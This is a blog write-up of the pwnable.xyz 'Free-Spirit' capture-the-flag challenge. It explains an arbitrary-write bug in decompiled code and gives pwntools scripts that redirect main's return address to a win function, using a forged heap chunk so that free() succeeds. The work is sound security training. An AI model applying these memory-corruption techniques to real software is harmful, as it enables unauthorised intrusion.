<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="google-site-verification" content="5tL3vVFDCs7jVMzgjoYnu0u--R7lK5YU0vkMz_MQxdA" />
  <title>Unicorn's Blog | pwnable.xyz Free-Spirit</title>
  <link rel="icon" type="image/png" href="/~b12902079/assets/images/profile_picture.jpg">
  
  <link rel="stylesheet" href="/~b12902079/assets/css/post.css" />
  <link rel="stylesheet" href="/~b12902079/assets/css/syntax.css" />
  
  <link rel="stylesheet" href="/~b12902079/assets/css/common.css" />
  <script src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
  <script src="/~b12902079/assets/js/categories.js"></script>
  <script>
    const currentTheme = localStorage.getItem("theme");
    if (currentTheme) {
      document.documentElement.setAttribute(
        "data-theme",
        localStorage.getItem("theme")
      );
    }
  </script>
  
  <script defer src="/~b12902079/assets/js/collapsible.js"></script>
  <script defer src="/~b12902079/assets/js/lbox.js"></script>
  
</head>

  <body>
    <main>
      <header>
  <a class="site-title" href="/~b12902079/">Unicorn's Blog</a>
  <!-- dark/light mode -->
  <span id="dark-mode-toggle" style="cursor: pointer">
    <svg
      stroke="currentColor"
      fill="currentColor"
      stroke-width="0"
      viewBox="0 0 16 16"
      height="1.2em"
      width="1.2em"
      xmlns="http://www.w3.org/2000/svg"
    >
      <path
        d="M8 1a7 7 0 1 0 0 14A7 7 0 0 0 8 1zm0 13V2a6 6 0 1 1 0 12z"
      ></path>
    </svg>
  </span>
</header>

      <section class="article">
        <div class="article-header">
          <h2 class="article-title">pwnable.xyz Free-Spirit</h2>
          <small class="date">26 Feb 2025</small>
          <div class="categories">
            
            <a href="#!" class="category">pwnableXYZ</a>
            
            <a href="#!" class="category">writeup</a>
            
          </div>
        </div>
        <ul class="content"><li><a href="#problem">Problem</a></li><li><a href="#recon">Recon</a></li><li><a href="#exploit">Exploit</a><ul><li><a href="#arbitrary-write">Arbitrary Write</a></li><li><a href="#ret2win">Ret2win</a></li><li><a href="#free">Free</a></li></ul></li></ul>
        <div class="content"><h1 id="problem">Problem</h1>

<blockquote>
  <p>Free is misbehaving.</p>
</blockquote>

<ul>
  <li><code class="language-plaintext highlighter-rouge">challenge</code>: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=f9c9a081578630d7b736a704a82a275c363b22d9, not stripped</li>
</ul>

<h1 id="recon">Recon</h1>

<p>The <code class="language-plaintext highlighter-rouge">main()</code> function in pseudo c, <code class="language-plaintext highlighter-rouge">1</code> can read 32 bytes on to the heap buffer, <code class="language-plaintext highlighter-rouge">2</code> can leak stack address, and <code class="language-plaintext highlighter-rouge">3</code> can move the value in heap buffer to somewhere.</p>

<figure class="highlight"><pre><code class="language-c" data-lang="c"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td><td class="code"><pre><span class="c1">// main</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">chunk_addr</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x40</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="nb">true</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__printf_chk</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"&gt; "</span><span class="p">);</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">buf</span><span class="p">;</span>
    <span class="n">__builtin_memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">);</span>
    <span class="kt">int32_t</span> <span class="n">input</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">input</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">syscall</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">chunk_addr</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">);</span> <span class="c1">// read(0, chunk_addr, 0x20);</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">input</span> <span class="o">==</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">__printf_chk</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">chunk_addr</span><span class="p">);</span>
            <span class="k">continue</span><span class="p">;</span>
        <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">input</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">limit</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span>
            <span class="k">else</span> <span class="p">{</span>
                <span class="kt">int64_t</span> <span class="n">var_60</span><span class="p">;</span>
                <span class="n">var_60</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">uint128_t</span><span class="o">*</span><span class="p">)</span><span class="n">chunk_addr</span><span class="p">;</span>
                <span class="k">continue</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">input</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// check stack </span>
            <span class="n">free</span><span class="p">(</span><span class="n">chunk_addr</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"Invalid"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></figure>

<h1 id="exploit">Exploit</h1>

<h2 id="arbitrary-write">Arbitrary Write</h2>

<p>Take a closer look at line 19 in assembly, the instruction <a href="https://c9x.me/x86/html/file_module_x86_id_184.html"><code class="language-plaintext highlighter-rouge">movdqu</code></a> will move unaligned double quadword, which is 128 bits (16 bytes), from heap buffer to <code class="language-plaintext highlighter-rouge">rsp+0x8</code>. Notice that <code class="language-plaintext highlighter-rouge">chunk_addr</code> (<code class="language-plaintext highlighter-rouge">rsp+0x10</code>) will also be overwrite by 0x0040088d, since we control the heap buffer data through option <code class="language-plaintext highlighter-rouge">1</code>, this create a arbitrary write. The following payload is able to write to any address repeatedly.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00400884  488b442410         mov     rax, qword [rsp+0x10 {chunk_addr}]
00400889  f30f6f00           movdqu  xmm0, xmmword [rax]
0040088d  f30f7f442408       movdqu  xmmword [rsp+0x8 {var_60}], xmm0
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1
&lt;4 bytes to write to chunk_addr&gt;&lt;next address to write&gt;
3
</code></pre></div></div>

<h2 id="ret2win">Ret2win</h2>

<p>Since we can control any address, we can set the return address of <code class="language-plaintext highlighter-rouge">main()</code> to <code class="language-plaintext highlighter-rouge">win()</code> (0x400a3e) with the script</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># pwn template --host svc.pwnable.xyz --port 30005 ./challenge
</span><span class="n">io</span> <span class="o">=</span> <span class="nf">start</span><span class="p">()</span>

<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">2</span><span class="sh">"</span><span class="p">)</span>
<span class="n">chunk_addr</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="nf">recvline</span><span class="p">().</span><span class="nf">strip</span><span class="p">().</span><span class="nf">decode</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">chunk_addr</span> <span class="o">=</span> <span class="si">:</span><span class="n">x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">ret_addr</span> <span class="o">=</span> <span class="n">chunk_addr</span> <span class="o">+</span> <span class="mh">0x58</span>

<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">ret_addr</span><span class="p">))</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">3</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nf">p64</span><span class="p">(</span><span class="mh">0x400a3e</span><span class="p">))</span>
</code></pre></div></div>

<h2 id="free">Free</h2>

<p>However the <code class="language-plaintext highlighter-rouge">free()</code> on line 25 will cause error, hence won’t return from <code class="language-plaintext highlighter-rouge">main()</code> and no flag for us. In order to <code class="language-plaintext highlighter-rouge">free()</code> successfully, we need to create a fake chunk, the address of the fake chunk doesn’t necessary needs to be in the heap, as long as <code class="language-plaintext highlighter-rouge">address &amp; 8 == 0</code> will be fine, I choose to use an empty memory <code class="language-plaintext highlighter-rouge">0x601100</code> to create the fake chunk with following structure</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"> </th>
      <th style="text-align: center">+0x0</th>
      <th style="text-align: center">+0x8</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">0x6010f0</td>
      <td style="text-align: center">empty</td>
      <td style="text-align: center">size = 0x50</td>
    </tr>
    <tr>
      <td style="text-align: center">0x601100</td>
      <td style="text-align: center">empty</td>
      <td style="text-align: center">empty</td>
    </tr>
  </tbody>
</table>

<p>Combine with the previous scripts</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">io</span> <span class="o">=</span> <span class="nf">start</span><span class="p">()</span>

<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">2</span><span class="sh">"</span><span class="p">)</span>
<span class="n">chunk_addr</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="nf">recvline</span><span class="p">().</span><span class="nf">strip</span><span class="p">().</span><span class="nf">decode</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">chunk_addr</span> <span class="o">=</span> <span class="si">:</span><span class="n">x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">ret_addr</span> <span class="o">=</span> <span class="n">chunk_addr</span> <span class="o">+</span> <span class="mh">0x58</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">ret_addr</span> <span class="o">=</span> <span class="si">:</span><span class="n">x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">fake_chunk_addr</span> <span class="o">=</span> <span class="mh">0x601100</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">fake_chunk_addr</span> <span class="o">=</span> <span class="si">:</span><span class="n">x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">fake_chunk_size</span> <span class="o">=</span> <span class="n">fake_chunk_addr</span> <span class="o">-</span> <span class="mh">0x8</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">fake_chunk_size</span> <span class="o">=</span> <span class="si">:</span><span class="n">x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">ret_addr</span><span class="p">))</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">3</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nf">p64</span><span class="p">(</span><span class="mh">0x400a3e</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">fake_chunk_size</span><span class="p">))</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">3</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nf">p64</span><span class="p">(</span><span class="mh">0x50</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">fake_chunk_addr</span><span class="p">))</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">3</span><span class="sh">"</span><span class="p">)</span>

<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">&gt; </span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">0</span><span class="sh">"</span><span class="p">)</span>

<span class="n">io</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>
</div>
      </section>
      <footer>
  <p>&copy; 2024 - 2025 | Unicorn's Blog</p>
</footer>
<script src="/~b12902079/assets/js/mode.js" defer></script>

    </main>
    <section id="category-modal-bg"></section>
<section id="category-modal">
  <h1 id="category-modal-title"></h1>
  <section id="category-modal-content"></section>
</section>

  </body>
</html>
